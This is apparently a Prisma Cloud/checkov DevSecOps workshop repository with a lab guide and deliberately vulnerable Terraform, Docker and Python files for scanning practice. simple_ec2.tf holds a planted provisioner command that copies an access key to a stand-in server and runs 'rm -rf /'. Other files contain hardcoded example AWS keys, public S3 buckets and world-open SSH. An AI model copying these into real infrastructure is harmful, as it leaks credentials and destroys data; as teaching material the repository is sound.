├── .gitignore
├── README.md
├── code
    ├── Dockerfile
    ├── deployment_ec2.tf
    ├── deployment_s3.tf
    ├── hello.py
    ├── requirements.txt
    ├── simple_ec2.tf
    └── simple_s3.tf
└── guide
    ├── DevSecOps-lab.md
    └── images
        ├── aws-create-stack.png
        ├── aws-s3-properties.png
        ├── aws-s3.png
        ├── aws-tag-drift.png
        ├── c9-blank-shell.png
        ├── c9-checkov-api-key.png
        ├── c9-checkov-d.png
        ├── c9-checkov-list.png
        ├── c9-checkov-options.png
        ├── c9-close-welcome.png
        ├── c9-console-home.png
        ├── c9-create-env.png
        ├── c9-env-options1.png
        ├── c9-env-options2.png
        ├── c9-env-options3.png
        ├── c9-git-clone.png
        ├── c9-install-checkov.png
        ├── c9-open-ide.png
        ├── c9-open-term.png
        ├── c9-py-venv.png
        ├── checkov-custom-checks.png
        ├── checkov-result.png
        ├── checkov-secrets.png
        ├── devsecops-workflow.png
        ├── ee-creds.png
        ├── ee-login.png
        ├── ee-sign-in.png
        ├── gh-action-commit.png
        ├── gh-action-edit.png
        ├── gh-actions-new-workflow.png
        ├── gh-actions-results.png
        ├── gh-actions-tab.png
        ├── gh-actions-workflows.png
        ├── gh-blocked-pr.png
        ├── gh-bp-rule.png
        ├── gh-branch-protection.png
        ├── gh-clone.png
        ├── gh-commit-directly.png
        ├── gh-commit-s3-change.png
        ├── gh-create-fork.png
        ├── gh-create-pr.png
        ├── gh-edit-checkov.png
        ├── gh-edit-s3.png
        ├── gh-fork.png
        ├── gh-merge-pr-fix.png
        ├── gh-new-file.png
        ├── gh-open-pr.png
        ├── gh-pr-fix1.png
        ├── gh-pr-fix2.png
        ├── gh-pr-merge.png
        ├── gh-pr.png
        ├── gh-prisma-comments.png
        ├── gh-propose-changes.png
        ├── gh-secret-created.png
        ├── gh-security-results.png
        ├── gh-select-repos.png
        ├── ghas-code-scanning-results.png
        ├── ghas-overview.png
        ├── github-create-secret.png
        ├── github-repo-secret.png
        ├── github-secrets.png
        ├── iam-console-home.png
        ├── iam-create-key.png
        ├── iam-create-user.png
        ├── iam-dashboard.png
        ├── iam-key-created.png
        ├── iam-key-options.png
        ├── iam-key-tag-and-create.png
        ├── iam-retrieve-key-data.png
        ├── iam-review-create.png
        ├── iam-set-perms.png
        ├── iam-user-details.png
        ├── prisma-access-control.png
        ├── prisma-access-key-created.png
        ├── prisma-appsec-home.png
        ├── prisma-appsec-projects.png
        ├── prisma-aws-added.png
        ├── prisma-aws1.png
        ├── prisma-aws2.png
        ├── prisma-aws3.png
        ├── prisma-aws4.png
        ├── prisma-cfn-output.png
        ├── prisma-cfn.png
        ├── prisma-checkov-api-key.png
        ├── prisma-checkov-results.png
        ├── prisma-cicd-risks.png
        ├── prisma-cloud-account.png
        ├── prisma-code-build-providers.png
        ├── prisma-connect-providers.png
        ├── prisma-create-access-key.png
        ├── prisma-csp-onboarding.png
        ├── prisma-dashboard-code.png
        ├── prisma-drift-result.png
        ├── prisma-enforcement-rules.png
        ├── prisma-enforcement-rules1.png
        ├── prisma-enforcement-rules2.png
        ├── prisma-enforcement-rules3.png
        ├── prisma-gh-app-results.png
        ├── prisma-gh-app.png
        ├── prisma-gh-auth.png
        ├── prisma-gh-done.png
        ├── prisma-gha-results.png
        ├── prisma-inventory.png
        ├── prisma-pr-fix1.png
        ├── prisma-pr-fix2.png
        ├── prisma-providers.png
        ├── prisma-sbom.png
        ├── prisma-select-repos.png
        ├── prisma-tfc-done.png
        ├── prisma-tfc-org.png
        ├── prisma-tfc-rt.png
        ├── prisma-tfc-token.png
        ├── prisma-tfc-workspace.png
        ├── prisma-traced-resource-policies.png
        ├── prisma-welcome.png
        ├── tfc-add-github.png
        ├── tfc-add-repo.png
        ├── tfc-apply-run.png
        ├── tfc-apply.png
        ├── tfc-configure-variables.png
        ├── tfc-create-token.png
        ├── tfc-org-details.png
        ├── tfc-plan-running.png
        ├── tfc-post-plan.png
        ├── tfc-pr-fix.png
        ├── tfc-run-queued.png
        ├── tfc-run-task-created.png
        ├── tfc-token-created.png
        ├── tfc-vars1.png
        ├── tfc-vars2.png
        ├── tfc-vcs-workflow.png
        ├── tfc-welcome.png
        ├── tfc-workspace-created.png
        ├── tfc-workspace1.png
        ├── tfc-workspace2.png
        ├── tfc-workspace3.png
        ├── vscode-extension.png
        ├── vscode-ide1.png
        ├── vscode-ide2.png
        ├── workshop-flow.png
        └── yor-tags.png


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Generics
 2 | .DS_Store
 3 | 
 4 | # Local .terraform directories
 5 | **/.terraform/*
 6 | 
 7 | # .tfstate files
 8 | *.tfstate
 9 | *.tfstate.*
10 | 
11 | # Crash log files
12 | crash.log
13 | crash.*.log
14 | 
15 | # Exclude all .tfvars files, which are likely to contain sensitive data, such as
16 | # password, private keys, and other secrets. These should not be part of version 
17 | # control as they are data points which are potentially sensitive and subject 
18 | # to change depending on the environment.
19 | *.tfvars
20 | *.tfvars.json
21 | 
22 | # Ignore override files as they are usually used to override resources locally and so
23 | # are not checked in
24 | override.tf
25 | override.tf.json
26 | *_override.tf
27 | *_override.tf.json
28 | 
29 | # Include override files you do wish to add to version control using negated pattern
30 | # !example_override.tf
31 | 
32 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
33 | # example: *tfplan*
34 | 
35 | # Ignore CLI configuration files
36 | .terraformrc
37 | terraform.rc
38 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # prisma-cloud-devsecops-workshop
2 | DevSecOps with Prisma Cloud
3 | 


--------------------------------------------------------------------------------
/code/Dockerfile:
--------------------------------------------------------------------------------
 1 | #old ubuntu
 2 | FROM ubuntu:18.04
 3 | 
 4 | RUN apt update
 5 | RUN apt install -y nginx php-fpm
 6 | 
 7 | # RUN pip install --no-cahce-dir --upgrade pip && \
 8 | #     pip install --no-cahce-dir requests=2.26.0 && \
 9 | #     pip install --no-cahce-dir django==1.2
10 | 
11 | COPY requirements.txt /requirements.txt
12 | COPY hello.py /hello.py
13 | CMD ["python3 hello.py"]
14 | 
15 | EXPOSE 80 443
16 | 


--------------------------------------------------------------------------------
/code/deployment_ec2.tf:
--------------------------------------------------------------------------------
  1 | resource "aws_instance" "web_host" {
  2 |   # ec2 have plain text secrets in user data
  3 |   ami           = "${var.ami}"
  4 |   instance_type = "t2.nano"
  5 | 
  6 |   vpc_security_group_ids = [
  7 |   "${aws_security_group.web-node.id}"]
  8 |   subnet_id = "${aws_subnet.web_subnet.id}"
  9 |   user_data = <<EOF
 10 | #! /bin/bash
 11 | sudo apt-get update
 12 | sudo apt-get install -y apache2
 13 | sudo systemctl start apache2
 14 | sudo systemctl enable apache2
 15 | export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMAAA
 16 | export AWS_SECRET_ACCESS_KEY=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
 17 | export AWS_DEFAULT_REGION=us-west-2
 18 | echo "<h1>Deployed via Terraform</h1>" | sudo tee /var/www/html/index.html
 19 | EOF
 20 |   
 21 | }
 22 | 
 23 | resource "aws_ebs_volume" "web_host_storage" {
 24 |   # unencrypted volume
 25 |   availability_zone = "${var.region}a"
 26 |   #encrypted         = false  # Setting this causes the volume to be recreated on apply 
 27 |   size = 1
 28 |   
 29 | }
 30 | 
 31 | resource "aws_ebs_snapshot" "example_snapshot" {
 32 |   # ebs snapshot without encryption
 33 |   volume_id   = "${aws_ebs_volume.web_host_storage.id}"
 34 |   description = "${local.resource_prefix.value}-ebs-snapshot"
 35 |   
 36 | }
 37 | 
 38 | resource "aws_volume_attachment" "ebs_att" {
 39 |   device_name = "/dev/sdh"
 40 |   volume_id   = "${aws_ebs_volume.web_host_storage.id}"
 41 |   instance_id = "${aws_instance.web_host.id}"
 42 | }
 43 | 
 44 | resource "aws_security_group" "web-node" {
 45 |   # security group is open to the world in SSH port
 46 |   name        = "${local.resource_prefix.value}-sg"
 47 |   description = "${local.resource_prefix.value} Security Group"
 48 |   vpc_id      = aws_vpc.web_vpc.id
 49 | 
 50 |   ingress {
 51 |     from_port = 80
 52 |     to_port   = 80
 53 |     protocol  = "tcp"
 54 |     cidr_blocks = [
 55 |     "0.0.0.0/0"]
 56 |   }
 57 |   ingress {
 58 |     from_port = 22
 59 |     to_port   = 22
 60 |     protocol  = "tcp"
 61 |     cidr_blocks = [
 62 |     "0.0.0.0/0"]
 63 |   }
 64 |   egress {
 65 |     from_port = 0
 66 |     to_port   = 0
 67 |     protocol  = "-1"
 68 |     cidr_blocks = [
 69 |     "0.0.0.0/0"]
 70 |   }
 71 |   depends_on = [aws_vpc.web_vpc]
 72 |   
 73 | }
 74 | 
 75 | resource "aws_vpc" "web_vpc" {
 76 |   cidr_block           = "172.16.0.0/16"
 77 |   enable_dns_hostnames = true
 78 |   enable_dns_support   = true
 79 |   
 80 | }
 81 | 
 82 | resource "aws_subnet" "web_subnet" {
 83 |   vpc_id                  = aws_vpc.web_vpc.id
 84 |   cidr_block              = "172.16.10.0/24"
 85 |   availability_zone       = "${var.region}a"
 86 |   map_public_ip_on_launch = true
 87 | 
 88 |   
 89 | }
 90 | 
 91 | resource "aws_subnet" "web_subnet2" {
 92 |   vpc_id                  = aws_vpc.web_vpc.id
 93 |   cidr_block              = "172.16.11.0/24"
 94 |   availability_zone       = "${var.region}b"
 95 |   map_public_ip_on_launch = true
 96 | 
 97 |   
 98 | }
 99 | 
100 | 
101 | resource "aws_internet_gateway" "web_igw" {
102 |   vpc_id = aws_vpc.web_vpc.id
103 | 
104 |   
105 | }
106 | 
107 | resource "aws_route_table" "web_rtb" {
108 |   vpc_id = aws_vpc.web_vpc.id
109 | 
110 |   
111 | }
112 | 
113 | resource "aws_route_table_association" "rtbassoc" {
114 |   subnet_id      = aws_subnet.web_subnet.id
115 |   route_table_id = aws_route_table.web_rtb.id
116 | }
117 | 
118 | resource "aws_route_table_association" "rtbassoc2" {
119 |   subnet_id      = aws_subnet.web_subnet2.id
120 |   route_table_id = aws_route_table.web_rtb.id
121 | }
122 | 
123 | resource "aws_route" "public_internet_gateway" {
124 |   route_table_id         = aws_route_table.web_rtb.id
125 |   destination_cidr_block = "0.0.0.0/0"
126 |   gateway_id             = aws_internet_gateway.web_igw.id
127 | 
128 |   timeouts {
129 |     create = "5m"
130 |   }
131 | }
132 | 
133 | resource "aws_network_interface" "web-eni" {
134 |   subnet_id   = aws_subnet.web_subnet.id
135 |   private_ips = ["172.16.10.100"]
136 | 
137 | }
138 | 
139 | # VPC Flow Logs to S3
140 | resource "aws_flow_log" "vpcflowlogs" {
141 |   log_destination      = aws_s3_bucket.flowbucket.arn
142 |   log_destination_type = "s3"
143 |   traffic_type         = "ALL"
144 |   vpc_id               = aws_vpc.web_vpc.id
145 | 
146 | 
147 | }
148 | 
149 | resource "aws_s3_bucket" "flowbucket" {
150 |   bucket        = "${local.resource_prefix.value}-flowlogs"
151 |   force_destroy = true
152 | 
153 | }
154 | 
155 | # OUTPUTS
156 | output "ec2_public_dns" {
157 |   description = "Web Host Public DNS name"
158 |   value       = aws_instance.web_host.public_dns
159 | }
160 | 
161 | output "vpc_id" {
162 |   description = "The ID of the VPC"
163 |   value       = aws_vpc.web_vpc.id
164 | }
165 | 
166 | output "public_subnet" {
167 |   description = "The ID of the Public subnet"
168 |   value       = aws_subnet.web_subnet.id
169 | }
170 | 
171 | output "public_subnet2" {
172 |   description = "The ID of the Public subnet"
173 |   value       = aws_subnet.web_subnet2.id
174 | }
175 | 


--------------------------------------------------------------------------------
/code/deployment_s3.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_s3_bucket" "data" {
 2 |   # bucket is public
 3 |   # bucket is not encrypted
 4 |   # bucket does not have access logs
 5 |   # bucket does not have versioning
 6 |   bucket        = "${local.resource_prefix.value}-data"
 7 |   force_destroy = true
 8 |   
 9 | }
10 | 
11 | resource "aws_s3_bucket_object" "data_object" {
12 |   bucket = aws_s3_bucket.data.id
13 |   key    = "customer-master.xlsx"
14 |   source = "resources/customer-master.xlsx"
15 |   
16 | }
17 | 
18 | resource "aws_s3_bucket" "financials" {
19 |   # bucket is not encrypted
20 |   # bucket does not have access logs
21 |   # bucket does not have versioning
22 |   bucket        = "${local.resource_prefix.value}-financials"
23 |   acl           = "private"
24 |   force_destroy = true
25 | 
26 | }
27 | 
28 | resource "aws_s3_bucket" "operations" {
29 |   # bucket is not encrypted
30 |   # bucket does not have access logs
31 |   bucket = "${local.resource_prefix.value}-operations"
32 |   acl    = "private"
33 |   versioning {
34 |     enabled = true
35 |   }
36 |   force_destroy = true
37 |   
38 | }
39 | 
40 | resource "aws_s3_bucket" "data_science" {
41 |   # bucket is not encrypted
42 |   bucket = "${local.resource_prefix.value}-data-science"
43 |   acl    = "private"
44 |   versioning {
45 |     enabled = true
46 |   }
47 |   logging {
48 |     target_bucket = "${aws_s3_bucket.logs.id}"
49 |     target_prefix = "log/"
50 |   }
51 |   force_destroy = true
52 |   
53 | }
54 | 
55 | resource "aws_s3_bucket" "logs" {
56 |   bucket = "${local.resource_prefix.value}-logs"
57 |   acl    = "log-delivery-write"
58 |   versioning {
59 |     enabled = true
60 |   }
61 |   server_side_encryption_configuration {
62 |     rule {
63 |       apply_server_side_encryption_by_default {
64 |         sse_algorithm     = "aws:kms"
65 |         kms_master_key_id = "${aws_kms_key.logs_key.arn}"
66 |       }
67 |     }
68 |   }
69 |   force_destroy = true
70 |   
71 | }
72 | 


--------------------------------------------------------------------------------
/code/hello.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import django
 3 | import flask
 4 | 
 5 | AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMAAAZYX"
 6 | AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY"
 7 | 
 8 | 
 9 | def main():
10 |     print("hello")
11 | 
12 | 
13 | if __name__ == "__main__":
14 |     main()
15 | 
16 | 


--------------------------------------------------------------------------------
/code/requirements.txt:
--------------------------------------------------------------------------------
1 | django==1.2
2 | flask==0.6
3 | requests==2.26.0
4 | 


--------------------------------------------------------------------------------
/code/simple_ec2.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   region = "us-west-2"
 3 | }
 4 | 
 5 | resource "aws_ec2_host" "test" {
 6 |   instance_type     = "t3.micro"
 7 |   availability_zone = "us-west-2a"
 8 | 
 9 |   provisioner "local-exec" {
10 |     command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /'   "
11 |   }
12 | 
13 | }
14 | 


--------------------------------------------------------------------------------
/code/simple_s3.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   region = "us-west-2"
 3 | }
 4 | 
 5 | resource "aws_s3_bucket" "dev_s3" {
 6 |   bucket_prefix = "dev-"
 7 | 
 8 |   tags = {
 9 |     Environment      = "Dev"
10 |   }
11 | }
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/guide/DevSecOps-lab.md:
--------------------------------------------------------------------------------
   1 | # Welcome
   2 | 
   3 | This workshop will demonstrate how to leverage infrastructure as code (IaC) and DevSecOps patterns to automate, scale, and improve the security posture of cloud infrastructure and applications. We will create a pipeline that ensures our configurations are secure and compliant from code to cloud.
   4 | 
   5 | This guide provides step-by-step instructions to integrate **Prisma Cloud** (and **checkov**) with **Terraform Cloud, GitHub, VScode** and **AWS**. 
   6 | 
   7 | ![](images/workshop-flow.png)
   8 | 
   9 | ![](images/devsecops-workflow.png)
  10 | 
  11 | 
  12 | 
  13 | ## Table of Contents
  14 | 
  15 | - [Welcome](#welcome)
  16 |   - [Table of Contents ](#table-of-contents)
  17 |   - [Learning Objectives](#learning-objectives)
  18 |   - [DevSecOps](#devsecops)
  19 |   - [Infrastructure as Code Using Terraform](#infrastructure-as-code-using-terraform)
  20 | 
  21 | - [Section 0: Setup AWS Environment](#section-0-setup)
  22 |   - [Prerequisites](#prerequisities)
  23 |   - [Log into AWS Event Engine](#log-into-aws-event-engine)
  24 |   - [Configure IAM User and API Key](#configure-iam-user-and-api-key)
  25 |   - [Configure Cloud9](#configure-cloud9)
  26 | 
  27 | - [Section 1: Code Scanning with checkov](#section-1-code-scanning-with-checkov)
  28 |   - [Install checkov](#install-checkov)
  29 |   - [Fork and clone target repository](#fork-and-clone-target-repository)
  30 |   - [Scan with checkov](#scan-with-checkov)
  31 |   - [Custom Policies](#custom-policies)
  32 |   - [IDE plugin](#ide-plugin)
  33 |   - [Integrate with GitHub Actions](#integrate-with-GitHub-actions)
  34 |   - [View results in GitHub Security](#view-results-in-GitHub-secuirty)
  35 |   - [Tag and Trace with yor](#tag-and-trace-with-yor)
  36 |   - [Branch Protection Rules](#branch-protection-rules)
  37 |   - [BONUS: Pre-commit hooks](#bonus-pre-commit-hooks)
  38 |   - [Integrate workflow with Terraform Cloud](#integrate-workflow-with-terraform-cloud)
  39 |   - [Block a Pull Request, Prevent a Deployment](#block-a-pull-request-prevent-a-deployment)
  40 |   - [Deploy to AWS](#deploy-to-aws)
  41 | 
  42 | - [Section 2: Application Security with Prisma Cloud](#section-2-application-security-with-prisma-cloud)
  43 |   - [Welcome to Prisma Cloud](#welcome-to-prisma-cloud)
  44 |   - [Onboard AWS account](#onboard-aws-account)
  45 |   - [Integrations and Providers](#integrations-and-providers)
  46 |   - [Checkov with API Key](#checkov-with-api-key)
  47 |   - [Terraform Cloud Run Tasks](#terraform-cloud-run-tasks)
  48 |   - [GitHub Application](#GitHub-application)
  49 |   - [Submit a Pull Request 2.0](#submit-a-pull-request-20)
  50 |   - [View scan results in Prisma Cloud](#view-scan-results-in-prisma-cloud)
  51 |   - [Issue a PR Fix](#issue-a-pr-fix)
  52 |   - [Drift Detection](#drift-detection)
  53 | 
  54 | - [Wrapping Up](#wrapping-up)
  55 | 
  56 | 
  57 | ## Learning Objectives
  58 | - Gain an understanding of DevSecOps and infrastructure as code (IaC) using Terraform
  59 | - Scan IaC files for misconfigurations locally
  60 | - Set up CI/CD pipelines to automate security scanning and policy enforcement
  61 | - Fix security findings and AWS resource misconfigurations with Prisma Cloud
  62 | 
  63 | **Let’s start with a few core concepts...**
  64 | 
  65 | ## DevSecOps
  66 | The foundation of DevSecOps lies in the DevOps movement, wherein development and operations functions have merged to make deployments faster, safer, and more repeatable. Common DevOps practices include automated infrastructure build pipelines (CI/CD) and version-controlled manifests (GitOps) to make it easier to control cloud deployments. By baking software and infrastructure quality requirements into the release lifecycle, teams save time manually reviewing code, letting teams focus on shipping features.
  67 | 
  68 | As deployments to production speed up, however, many traditional cloud security concepts break down. With the rise of containerized technologies, serverless functions, and IaC frameworks, it is increasingly harder to maintain visibility of cloud security posture. 
  69 | 
  70 | By leveraging DevOps foundations, security and development teams can build security scanning and policy enforcement into automated pipelines. The ultimate goal with DevSecOps is to “shift cloud security left.” That means automating it and embedding it earlier into the development lifecycle so that actions can be taken earlier. Preventing risky deployments is a more proactive approach to traditional cloud security that often slows down development teams with deployment rollbacks and disruptive fixes.
  71 | 
  72 | For DevSecOps to be successful for teams working to build and secure infrastructure, embracing existing tools and workflows is critical. At Palo Alto Networks, we’re committed to making it as simple, effective, and painless as possible to automate security controls and integrate them seamlessly into standard workflows.
  73 | 
  74 | 
  75 | 
  76 | 
  77 | ## Infrastructure as Code Using Terraform
  78 | Infrastructure as code (IaC) frameworks, such as  HashiCorp Terraform, make cloud provisioning scalable and straightforward by leveraging automation and code. Defining our cloud infrastructure in code simplifies repetitive DevOps tasks and gives us a versioned, auditable source of truth for the state of an environment.
  79 | 
  80 | Terraform is useful for defining resource configurations and interacting with APIs in a codified, stateful manor. Any updates we want to make, such as adding more instances, or changes to a configuration, can be handled by Terraform. 
  81 | 
  82 | For example, the following Terraform resource block defines a simple AWS S3 bucket:
  83 | 
  84 | ```hcl
  85 | resource "aws_s3_bucket" "data" {
  86 |   bucket     = "my_bucket_name"
  87 |   acl        = "public-read-write"
  88 | }
  89 | ```
  90 | 
  91 | After performing `terraform init`, we can provision an S3 bucket with the following command:
  92 | 
  93 | ```bash
  94 | terraform apply
  95 | ```
  96 | 
  97 | Any changes made to the resource definition within a .tf file, such as adding tags or changing the acl, can be pushed with the  `terraform apply` command. 
  98 | 
  99 | Another benefit of using Terraform to define infrastructure is that code can be scanned for  misconfigurations before the resource is created. This allows for security controls to be integrated into the development process, preventing issues from ever being introduced, deployed and exploited.
 100 | 
 101 | # Section 0: Setup AWS Environment
 102 | 
 103 | ## Prerequisities
 104 | - GitHub account
 105 | - Terraform Cloud account
 106 | - AWS account (provided during workshop)
 107 | - Prisma Cloud account (OPTIONAL)
 108 | 
 109 | ## Log into AWS Event Engine
 110 | > [!NOTE]
 111 | > *This section is for live workshop events only.*
 112 | 
 113 | Follow the link provided to you for Event Engine. Enter the event hash (if it is not already populated), and click `Accept Terms & Login`.
 114 | 
 115 | ![ee-login](images/ee-login.png)
 116 | 
 117 | Choose your perferred sign-in method (OTP is recommended for workshop attendees).
 118 | 
 119 | ![ee-sign-in](images/ee-sign-in.png)
 120 | 
 121 | Once logged in, copy the provided credentials into a local text file and then click `Open Console` to navigate to AWS.
 122 | 
 123 | ![ee-creds](images/ee-creds.png)
 124 | 
 125 | ## Configure IAM User and API Key
 126 | 
 127 | From the AWS console, select `IAM` or search for 'IAM' in the Search bar if not displayed.
 128 | 
 129 | ![iam-console-home](images/iam-console-home.png)
 130 | 
 131 | In the IAM Dashboard, click `Users` on the left sidebar.
 132 | 
 133 | ![iam-dashboard](images/iam-dashboard.png)
 134 | 
 135 | Click the `Create User` button on the top right.
 136 | 
 137 | ![create-user](images/iam-create-user.png)
 138 | 
 139 | Specify a `User name` that will be unique then click `Next`.
 140 | 
 141 | ![user-details](images/iam-user-details.png)
 142 | 
 143 | Next, set the permissions for the user by selecting `Attach policies directly` and attaching the `AdministratorAccess` policy.
 144 | 
 145 | ![iam-set-perms](images/iam-set-perms.png)
 146 | 
 147 | Review the user details and click `Create user`.
 148 | 
 149 | ![iam-review-create](images/iam-review-create.png)
 150 | 
 151 | Now we need to assign an API key to the user we just created. Click on the user you just created from the IAM Dashboard and then click `Create access key` on the right.
 152 | 
 153 | ![iam-create-key](images/iam-create-key.png)
 154 | 
 155 | Select `Other` from the Access Key options.
 156 | 
 157 | ![iam-key-options](images/iam-key-options.png)
 158 | 
 159 | Optionally, supply a tag to associate with the Access Key, then click `Create access key`.
 160 | 
 161 | ![iam-key-tag-and-create](images/iam-key-tag-and-create.png)
 162 | 
 163 | Finally, save the Access Key data provided (copy to a local file). This credential will be used to deploy resources to AWS in a later section. When ready, click `Done`.
 164 | 
 165 | ![iam-retrieve-key-data](images/iam-retrieve-key-data.png)
 166 | 
 167 | An access key will now appear on the User details page.
 168 | 
 169 | ![iam-key-created](images/iam-key-created.png)
 170 | 
 171 | 
 172 | ## Configure Cloud9
 173 | To ensure we all have the same environent configuration, we will use Cloud9, a cloud-delivered IDE from AWS, to carry out many of the steps in this workshop. To set this up, navigate back to the AWS Console home and select Cloud9 (or enter it into the Search bar).
 174 | 
 175 | 
 176 | ![c9-console-home](images/c9-console-home.png)
 177 | 
 178 | On the Cloud9 Environments page, click `Create Environment`.
 179 | 
 180 | ![c9-create-env](images/c9-create-env.png)
 181 | 
 182 | Enter a `Name` for the Environemnt and select `New EC2 instance` for Environment Type.
 183 | 
 184 | ![c9-env-options1](images/c9-env-options1.png)
 185 | 
 186 | Select `Additional instance types` then choose `t3.medium` from the drop-down.
 187 | 
 188 | ![c9-env-options2](images/c9-env-options2.png)
 189 | 
 190 | Leave all other options on default setting and click `Create`. 
 191 | 
 192 | ![c9-env-options3](images/c9-env-options3.png)
 193 | 
 194 | 
 195 | Once the environment is created, navigate to it and click `Open in Cloud9` to launch the IDE.
 196 | 
 197 | ![c9-open-ide](images/c9-open-ide.png)
 198 | 
 199 | Close all of the default windows, then create a New Terminal window.
 200 | 
 201 | ![c9-close-welcome](images/c9-close-welcome.png)
 202 | 
 203 | ![c9-open-term](images/c9-open-term.png)
 204 | 
 205 | ![c9-blank-term](images/c9-blank-shell.png)
 206 | 
 207 | Congrats! Cloud9 is now ready to use. Before installing checkov or pulling code to scan, create and activate a python virtual environment to better organize python packages.
 208 | 
 209 | ``` 
 210 | python3 -m venv env
 211 | source ./env/bin/activate 
 212 | ```
 213 | 
 214 | ![c9-py-venv](images/c9-py-venv.png)
 215 | 
 216 | ##
 217 | # Section 1: Code Scanning with checkov
 218 | 
 219 | [Checkov](https://checkov.io) is an open source 'policy-as-code' tool that scans cloud infrastructure defintions to find misconfigurations before they are deployed. Some of the key benefits of checkov:
 220 | 1. Runs as a command line interface (CLI) tool 
 221 | 2. Supports many common plaftorms and frameworks 
 222 | 3. Ships with thousands of default policies
 223 | 4. Works on windows/mac/linux (any system with python installed)
 224 | 
 225 | ## Install checkov
 226 | 
 227 | To get started, install checkov using pip:
 228 | 
 229 | ```
 230 | pip3 install checkov
 231 | ```
 232 | 
 233 | ![](images/c9-install-checkov.png)
 234 | 
 235 | 
 236 | 
 237 | 
 238 | Use the `--version` and `--help` flags to verify the install and view usage / optional arguements.
 239 | 
 240 | ```
 241 | checkov --version
 242 | checkov --help
 243 | ```
 244 | ![](images/c9-checkov-options.png)
 245 | 
 246 | To see a list of every policy that checkov can enforce, use the `-l` or ` --list` options.
 247 | 
 248 | ```
 249 | checkov --list
 250 | ```
 251 | 
 252 | Now that you see what checkov can do, let's get some code to scan...
 253 | 
 254 | 
 255 | 
 256 | ## Fork and clone target repository
 257 | This workshop involves code that is vulnerable-by-design. All of the necessary code is contained within [this repository](https://GitHub.com/paloAltoNetworks/prisma-cloud-devsecops-workshop) or workshop guide itself.
 258 | 
 259 | To begin, log into GitHub and navigate to the [Prisma Cloud DevSecOps Workshop](https://GitHub.com/paloAltoNetworks/prisma-cloud-devsecops-workshop) repository. Create a `Fork` of this repository to create a copy of the code in your own account.
 260 | 
 261 | ![](images/gh-fork.png)
 262 | 
 263 | Ensure the selected `Owner` matches your username, then proceed to fork the repository by clicking `Create fork`.
 264 | 
 265 | ![](images/gh-create-fork.png)
 266 | 
 267 | Grab the repo URL from GitHub, then clone the **forked** repository to Cloud9.
 268 | 
 269 | ![](images/gh-clone.png)
 270 | 
 271 | ```
 272 | git clone https://github.com/<your-organization>/prisma-cloud-devsecops-workshop.git
 273 | cd prisma-cloud-devsecops-workshop/
 274 | git status
 275 | 
 276 | ```
 277 | 
 278 | ![](images/c9-git-clone.png)
 279 | 
 280 | 
 281 | Great! Now we have some code to scan. Let's jump in...
 282 | 
 283 | 
 284 | 
 285 | ## Scan with checkov
 286 | 
 287 | Checkov can be configured to scan files and enforce policies in many different ways. To highlight a few: 
 288 | 1. Scans can run on individual files or entire directories. 
 289 | 2. Policies can be selected through selection or omission. 
 290 | 3. Enforcement can be determined by flags that control checkov's exit code.
 291 | 
 292 | 
 293 | Let's start by scanning the entire `./code` directory and viewing the results.
 294 | 
 295 | ```
 296 | cd code/
 297 | checkov -d .
 298 | ```
 299 | ![](images/c9-checkov-d.png)
 300 | 
 301 | Failed checks are returned containing the offending file and resource, the lines of code that triggered the policy, and a guide to fix the issue.
 302 | 
 303 | ![](images/checkov-result.png)
 304 | 
 305 | Now try running checkov on an individual file with `checkov -f <filename>`. 
 306 | 
 307 | ```
 308 | checkov -f deployment_ec2.tf
 309 | ```
 310 | ```
 311 | checkov -f simple_ec2.tf
 312 | ```
 313 | 
 314 | > **⍰  Question** 
 315 | >
 316 | > Why are there more security findings for `deployment_ec2.tf` than there are for `simple_ec2.tf`? What about `simple_s3.tf` vs `simple_ec2.tf`?
 317 | 
 318 | 
 319 | Policies can be optionally enforced or skipped with the `--check` and `--skip-check` flags. 
 320 | 
 321 | ```
 322 | checkov -f deployment_s3.tf --check CKV_AWS_18,CKV_AWS_52
 323 | ```
 324 | ```
 325 | checkov -f deployment_s3.tf --skip-check CKV_AWS_18,CKV_AWS_52
 326 | ```
 327 | 
 328 | Frameworks can also be selected or omitted for a particular scan.
 329 | 
 330 | 
 331 | ```
 332 | checkov -d . --framework secrets --enable-secret-scan-all-files
 333 | ```
 334 | ```
 335 | checkov -d . --skip-framework dockerfile
 336 | ```
 337 | 
 338 | ![](images/checkov-secrets.png)
 339 | 
 340 | 
 341 | Lastly, enforcement can be more granularly controlled by using the `--soft-fail` option. Applying `--soft-fail` results in the scan always returning a 0 exit code. Using `--hard-fail-on` overrides this option. 
 342 | 
 343 | Check the exit code when running `checkov -d . ` with and without the `--soft-fail` option.
 344 | 
 345 | ```
 346 | checkov -d . ; echo $?
 347 | ```
 348 | ```
 349 | checkov -d . --soft-fail ; echo $?
 350 | ```
 351 | 
 352 | An example of using `--soft-fail` and exit codes in a pipeline context will be demosntrated in a later section.
 353 | 
 354 | 
 355 | ## Custom Policies
 356 | 
 357 | Checkov supports the creation of [Custom Policies](https://www.checkov.io/3.Custom%20Policies/YAML%20Custom%20Policies.html) for users to customize their own policy and configuration checks. Custom policies can be written in YAML (recommended) or python and applied with the `--external-checks-dir` or `--external-checks-git` flags. 
 358 | 
 359 | Let's create a custom policy to check for [local-exec and remote-exec Provisioners](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec) being used in Terraform resource definitons. (Follow link to learn more about provisioners and why it is a good idea to check for them).
 360 | 
 361 | ```yaml
 362 | metadata:
 363 |  name: "Terraform contains local-exec and/or remote-exec provisioner"
 364 |  id: "CKV2_TF_1"
 365 |  category: "GENERAL_SECURITY"
 366 | definition:
 367 |  and:
 368 |   - cond_type: "attribute"
 369 |     resource_types: all 
 370 |     attribute: "provisioner/local-exec"
 371 |     operator: "not_exists"
 372 |   - cond_type: "attribute"
 373 |     resource_types: all
 374 |     attribute: "provisioner/remote-exec"
 375 |     operator: "not_exists"
